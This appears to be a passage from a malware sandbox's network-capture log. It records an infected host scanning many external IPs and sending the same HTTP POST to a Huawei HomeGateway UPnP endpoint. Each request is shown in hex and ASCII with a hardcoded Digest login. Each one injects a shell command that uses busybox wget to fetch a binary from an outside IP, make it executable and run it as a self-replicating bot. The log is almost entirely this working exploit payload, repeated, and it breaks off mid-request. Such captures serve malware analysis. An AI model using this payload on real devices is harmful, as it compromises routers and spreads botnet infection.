20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1324192.168.2.1334738157.214.46.8937215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:18.537584066 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1325192.168.2.1355352197.247.60.21237215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:18.537658930 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1326192.168.2.1343408157.172.88.1837215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:18.538099051 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1327192.168.2.1351628197.128.188.337215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:18.538129091 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1328192.168.2.134490041.197.25.19737215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:18.538150072 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1329192.168.2.1348644157.79.251.25337215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:18.538350105 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1330192.168.2.1345980129.79.86.16337215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:18.538372040 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1331192.168.2.1359490197.93.59.3137215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:18.538378954 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1332192.168.2.1334568197.220.103.7337215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:20.557564020 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1333192.168.2.134095231.152.128.12537215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:20.557611942 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1334192.168.2.1354172175.57.173.5837215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:20.557614088 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
